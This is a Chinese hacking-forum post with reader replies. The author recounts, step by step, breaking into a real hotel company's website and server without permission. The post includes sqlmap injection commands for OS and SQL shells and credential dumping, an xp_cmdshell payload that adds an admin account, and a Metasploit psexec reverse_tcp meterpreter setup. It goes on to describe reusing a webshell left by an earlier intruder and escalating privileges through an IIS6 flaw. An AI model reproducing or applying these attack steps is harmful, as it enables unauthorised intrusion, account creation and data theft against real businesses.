【攻防小组审核文章】一次极具戏剧性的渗透经历

sladjfksld

        网站其实一个月前就拿下了，这篇文章当时就写了，不过一直耽搁没发出来。昨晚看到攻防小组招人，最近刚好想加入一些团队学习，就投了个稿，管理让我发出来哪就发吧。。都是比较常规的方法，大牛就不用看了，仅同小白分享。
        好了，废话不多说下面转入正题。目标是一个hotel站，为了不误导小学生，所有图片都会把敏感信息擦掉。之所以找到这个站是因为在google搜时时彩时发现这个站被挂满了菠菜。78400条搜索结果，百分之九十以上都是菠菜信息，不得不说菠菜实在太仓狂了。。。。。既然你搞菠菜的都能拿下，哥为什么不能拿下？？？等哥拿下了，有你好看！~@

        打开主页看了看，第一感觉网站不是很复杂，不知道hotel老板有没有发现自己的网站已经被菠菜给霸占了@@@！

        又到其他页面看了看，确定这是一个aspx网站，随手用and 1=1 和and 1=2，直接全部报错。可能初学者看到这个就放弃了，不过根据经验，这类网站很大程度上存在SQL注入。然后又尝试在url后添加admin，没有跳转到后台，返回信息提示：Directory Listing Denied，说明存在admin路径，只是服务器设置了拒绝访问。又看了看其他的页面，没有发现可利用的地方。

        先查查whois信息，查询结果如下，iis6.0web容器（可利用解析漏洞？），服务器就这一个站点，不可能旁站。另外楼主还不会C段，所以C段就不用考虑了。哪就只能从网站本身入手了。

       

        不管了，先丢神器扫一扫，根据扫描结果决定下一步行动。御剑的扫描结果让人非常失望，没有发现后台，也没有发现编辑器，只有两个可能利用的点：一个是http://www.xxxx.com/member/login.aspx，一个是http://www.xxxx.com/upload.asp?action=upfile。看了看，前面的一个是酒店会员登录，后面一个是个上传点，然而打开直接返回error，尝试修改action参数无果，去掉action也无果，看来管理员把这个上传点改了，此路不通。

        既然如此，哪就祭出大杀器netsparker，一般情况下哥不喜欢用netsparker，感觉有点像ddos，不过这次事急从权~~~!
netsparker果然牛逼，不一会就爆出红彤彤的高危漏洞。汇总了一下可以利用的几个点：一个是SQL注入，一个是当前用户有sa权限，一个是sqlserver2008数据库，一个是windows server2003服务器，最后一个是web根目录。
看到这里哥就乐了，sql注入+sa权限+web根目录，这不可以直接差异备份写shell了么，如果xp_cmdhell可用，那就可以直接提权了。。。网站安全做的如此差，怪不得被菠菜给拱了。。。（当然事后证明，楼主高兴的太早了，也正是这看似简单的漏洞让哥瞎忙活了一个多星期，期间辛酸尝试各种姿势、各种手段而无果）
        既然有SQL注入，哪就先丢到SQLMAP跑跑，然后利用交互式写shell、提权。Sqlmap的扫描结果和netsparker相同，哪就直接在注入点后面加上—os-shell，先写一个shell再说。sqlmap -u http://www.site.com/Article.aspx?ArticleID=1" --os-shell
        让人意外的是sqlmap竟然直接跑出了该站xp_cmdshell可用，这可是意外之喜，一切都似乎在向着好的方向发展。。。直接在os-shell处添加一个用户：net user admin password /add，然而执行后没有返回，没有返回通常情况下就是创建不成功，哥有点蒙了。先不管了继续添加管理员：net localgroup administrators admin /add，照样没有返回。
        抱着一点念想远程连接试试，屏幕弹出了意料之中但又情理之外的提示框（请看下图）！SA权限+web根目录竟然不能拿下，楼主也是第一次碰到这种情况，然而这时抓破脑袋也想不出个所以然来。
       
        既然此路不通，哪就退而求其次，试试另外一条路：sqlmap –u http://www.site.com/xxxxx.aspx=xxxxxxxx --sql-shell，先写shell再提权。然而结果又一次让我失望，竟然连shell也写不进去。。。。尼玛这不坑爹么，哥不由为sa权限感到惋惜。
       
        sa权限可以干的事情很多，除了上面的思路还可以结合sa的password利用sql连接器提权。想到这里，哥直接利用sqlmap跑出当前sa账户的密码来：http://www.site.com/xxxxx.aspx=xxxxxxxx" –current-user –password。结果是一串hash过的密码，先用sqlmap自带的字典爆破，未果。又拿到cain里头跑一跑，从网上down了一个3G的字典，然而经过漫长的爆破，仍然未果，看来字典不给力呀。
       
        好吧，到这里也就试试爆库爆表，看能不能找到管理密码了，然后再找找管理后台，希望能够奏效。
Sqlmap.py –u http://www.site.com/xxxxx.aspx=xxxxxxxx –dbs
        一下子跑出来12个数据库，继续爆表，但爆表的时候楼主彻底傻眼了。。。这尼玛平均每个库都至少有100个以上的表，表名差别真的一点不大，这管理表要找到何年何月？更何况sqlmap的拖库速度慢的不是一点半点，还经常跑不出来数据。。。同时，哥又用御剑扫了扫网站路径，还googlehacking了一下，依然没有找到后台。这样，我对后台登陆也不抱希望了。
       
        思路还是回到sa权限上面来，这么诱人的权限不能轻易放弃呀，既然sqlmap不能写shell提权，那咱就放到getwebshell试试，方法多多~~~。
然而getwebshell在关键时刻也不getwebshell了，sa+sql注入+web根目录无法写入shell，有木有啊！！！！又用穿山甲试了试，同样无法写入，不能执行CMD命令！#$尝试读注册表，返回无法读取。。。
       
       
        好吧，前面御剑不是扫描出一个会员登录么，咱试试能不能上传个图片利用解析漏洞，再不济就试试XSS，虽然我一向不善用XSS，但到了这个地步也不得不用了。然而结果再一次无果，注册登陆后没有上传图片的地方。。。。试了一下XSS本地有javascript拦截，通过burp抓包绕过，然而也无果。尝试客户留言，特殊符号直接被转义，看来此路又走到死胡同了。
       
        渗透走到这里也是一阵头昏脑涨，出去吹个风清醒清醒，回来继续开工。总结了一下前面的方法，感觉最好的方法还是得放到SA权限上面来。然而SQLMAP、穿山甲、getwebshell相继折戟，hash密码破解不出，还能从什么地方突破？？？
        好吧，当你走投无路之时，一定不要忘记度娘和谷哥，一顿狂搜，悲剧的是竟然没有搜到类似的问题，难道哥的运气就这么好，碰到这少见的bug？后来想想也释然，现在采用sqlserver服务器的网站已经凤毛麟角，再碰上这样问题的就更加鲜见了。
        万般无赖之下，想到用手工试试，说不定是工具的请求语句刚好被网站给过滤了呢？说干就干，不重要的就忽略了，直接贴主要语句：
http://www.site.com/xxxxx.aspx=xxxxxxxx’;EXEC master..xp_cmdshell “net user admin password /add”—
        哥满怀祈祷希望能有惊喜，然而然而。。。然而。。。。无力吐槽了。。。。又尝试sql语句写shell，同样的返回结果。。。又尝试各种编码转换、语句变形，整整搞了一个下午，但返回的页面永远是一成不变。。。哥要抓狂了，各种百度，各种论坛QQ群像大牛请教，最后猜测是mssql被做了降权处理。。。这个降权降得还真够狠的。。。。同时哥还猜是前人拿下了这个站，把漏洞都修补了，好方便他们搞菠菜，真够腹黑的。。
       
        前后已经倒腾了2天，到了这一步也是无计可施了。先放放，说不定哪天突然灵光一现就拿下了呢。
        。。。。。。。。。。。。。。。。。。。。。。。
        大概过了四五天，一次在教程中偶然看到msf提权可以利用hash密码和管理账号可以直接入侵主机，好吧小白就是小白，以前压根就没听过。这个思路倒是可以利用，但转念一想，之前读出来的hash密码是sqlserver的呀，不是服务器管理账号，又有点小郁闷了。
        抱着不死心的态度，用sqlmap跑了一下。可能是老天爷看我太执着，想要给我一点小惊喜，测试账号权限的时候发现了一个点，直接看截图：当前连接的sa账号后面跟了一个administrator注释。用我知之不多的大脑解释一下：sa账户有可能有服务器管理权限？更甚者sa账户名就是administrator????这里推断不一定正确，如果大牛发现错误请指正！！！
       
        到了这一步，楼主说啥也要试试msf提权了，虽然之前压根就没用过kali和metasplot，也没听过msf提权，但谁让咱入了渗透这条不归路？？~~！
安装和调试kali又用了一天一夜，期间波折就不说了，各种意外、各种出错。。。。。。当看到kali的飞龙标志时，哥不禁有点小激动了，希望这一次努力不会白费，又用半天时间学习msf提权。OK，万事俱备只欠东风~~~~！下面直接贴上代码，多余的不解释，不懂的自己去查资料。
service postgresql start
service metasploit start
msfconsole
use exploit/windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST XXX.XXX.XXX.XXX（本机IP）
set RHOST XXX.XXX.XXX.XXX（服务器IP）
set SMBUser administrator(这里换了好几个账号尝试)
set SMBPass xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx（那一长串hash密码）
exploit
        楼主用颤抖着的手按下了回车键，满满的渴望着succeed的返回提示！！然而。。。然而。。。可能是嫌我还不够苦逼，大kali很不客气的给我返回了一个连接超时的错误提示。。。。。又是各种修改尝试，终究无果！！！！一个多星期的辛酸，一天一夜的各种纠结，没有收到成果。。。。心中一万个草泥马奔腾不停。。。！！！！（这里服务器拿下权限后看了下，服务器在内网，可能是这点导致没有成功，也可能是sa的密码和administrator的密码根本就不是同一个）
       
        好吧，这条路又被无情的堵死了。。。其时正值深夜，窗外万籁俱静，繁星点点，人们都已入眠。看着外面昏暗的灯光，哥不禁想起了李白的哪首“蜀道难，难于上青天”的淫诗。所谓一如渗透深似海，这条路注定是孤独而又苦逼的！
        到阳台上透透气，清醒清醒大脑，回来继续。到了现在哥还在坚持，因为哥坚信一个优秀的渗透人需要一颗百折不挠而又无比闷骚的内心~~！！只有这样方能突破重重困难，尝到胜利果实。
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
        再来整理整理思路，之前的尝试几乎把所有能想到的高大上和矮穷挫的方法都试过了，现在最可行的办法就是在原来的思路上继续深挖。又回到网站转了转，产生一个想法：aspx的网站会不会用asp文件的脚本呢？好吧，到了这一步，不管它用不用，哥也要尝试一下。祭出御剑，同时添加了aspx和asp的字典，还把30x和403的返回码也勾选上了。没想到这一扫就发现了端倪，网站真的有很多asp文件~~~！而且还发现了fckeditor，哥不禁敲敲脑袋苦笑不已，之前咋就没想到用御剑多仔细的扫一扫呢？？
       
        （此图说明一下，在一开始扫目录的时候也扫过，这里为方便就放在下面）
        这会应该是十拿九稳了吧，既然发现了fckeditor，哪就直奔漏洞，先拿出fckeditor漏洞利用工具，结果结果却是。。。然并卵。。。所有的路径都被删除无法打开。。。尼玛这管理是不是黑客转行的，咋把所有能想到的漏洞都删了呢？？？又百度各种fckeditor漏洞，结果依旧是然并卵。。。
        经过前面无数次的希望—失望—希望—失望。。。。哥现在已经是千锤百炼、金刚不倒葫芦娃了，呵呵(ˇˍˇ) 你来啥，哥就接啥，这个思路不行，哥就换下一个。。。哥就不信在有生之年拿不下你（呵呵~~开个玩笑）。
        继续用asp字典往下扫描网站分目录，先扫admin，哈哈看看发现了啥，返回200的不是管理后台路径吗？？后台就这样被发现了？？？~~~！@@@有木有。。。
       
        先打开看看，然而然而浏览器返回的结果是然并卵。。。。。这些路径都是无效的。。。管理真是鸡智啊。。。又花了2个小时扫其他目录，结果依旧是然并卵。。。网站路径已发掘到极致，管理后台之路又是个死胡同。。。
       
       
        这时哥也没什么思路了，对着管理后台的空白页面发呆。。。万般无聊之时，下意识右键—点开审查元素。。。激动人心的时刻到了~~~有木有（你要问哥当时是怎么想到的，哥只能说是天意，完全就是无意识随便点开的）。看到没，最上面哪一行咋就那么眼熟呢？？？咋就那像个一句话呢？？？虽然这个一句话牛头不对马嘴（asp的文件，却用的php一句话，还被注释掉了），但可以确定绝对是前人的脚印，里面会不会有一个隐藏的一句话呢？？？。
       
        妈蛋，不管三七二十一先上菜刀，实在连不上就爆破。。。选择php脚本，连接无果。换成asp脚本，哈哈哈哈:-D:-D:-D孜孜以求的结果终于出现了，不容易呀有木有~~~！！！@连爆破都省了。。。
       
        最后看看这个页面脚本到底是怎么回事？？上面一个php的一句话，下面一个asp的一句话，怪不得用asp就连上了。。
       
        好了，这一次渗透到了这里也就快要到尾声了，下面就是提权，一路顺利，主要是利用了iis6的溢出漏洞（PS：拿下shell后执行whoami发现当前权限不是system而是network service，这也解释了为什么前面尝试sa提权不成功了），不到十分钟拿下服务器权限，过程就不说了，贴一个服务器的截图@@@
       
        上面就是楼主的一次完整的渗透实战，全部看完的人可能会想：洋洋洒洒数千字，只有最后一段才是有效的，并且还是撞了大运！
不错，前面的各种思路，各种方法都被证明是无效的，最后能拿下网站也是百分之九十九的的狗屎运外加百分之一的辛劳。但哥还是要说这就是一次非常常态化的渗透，至少对于我来说却是如此，大牛请一笑而过。网上的很多渗透实战都只把成功的方法写出来，中间很多无效失败的方法省略了，给刚入门的感觉就是拿站就像砍瓜切菜，手到擒来，然而一轮到自己就嗝屁了。。。至少我刚玩渗透就是这样的，在以后的很长时间会继续这样。
        上面的无效方法，仅供和我一样的菜鸟参考，或许一些方法就能帮助你在那次没有思路的时候灵光一现。

NONONO

支持像你们一样的新鲜血液

kllay

支持下

wuyan

很不错，很详细，而且很多值得学习的地方，

grape

真的很棒。谢谢分享，从中看到了坚持和努力

grape

真的很棒。谢谢分享，从中看到了坚持和努力

昊情·

其实在sqlmap操作过程中早已证明msf等相关写入漏洞利用不了。（请参考）

sladjfksld

昊情· 发表于 2015-9-22 22:45
其实在sqlmap操作过程中早已证明msf等相关写入漏洞利用不了。（请参考）

是考虑过，sqlmap、穿山甲或者手注这些本质都是通过SQL语句写入的，但我不知道每个工具具体的执行语句是什么，是不是有区别，另外也没有别的好办法，说不定一个语句不能执行，另外的就能执行了，所以就都一个个的试了一遍。
另外msf提权和sa写入原理是一样的么？我对metasploit不是太了解，这个还真不懂。。。

昊情·

sladjfksld 发表于 2015-9-22 23:11
是考虑过，sqlmap、穿山甲或者手注这些本质都是通过SQL语句写入的，但我不知道每个工具具体的执行语句是 ...

你想想吧，有时还确实还挺伤脑筋的。

emper

唉，之前拿下那个人好变态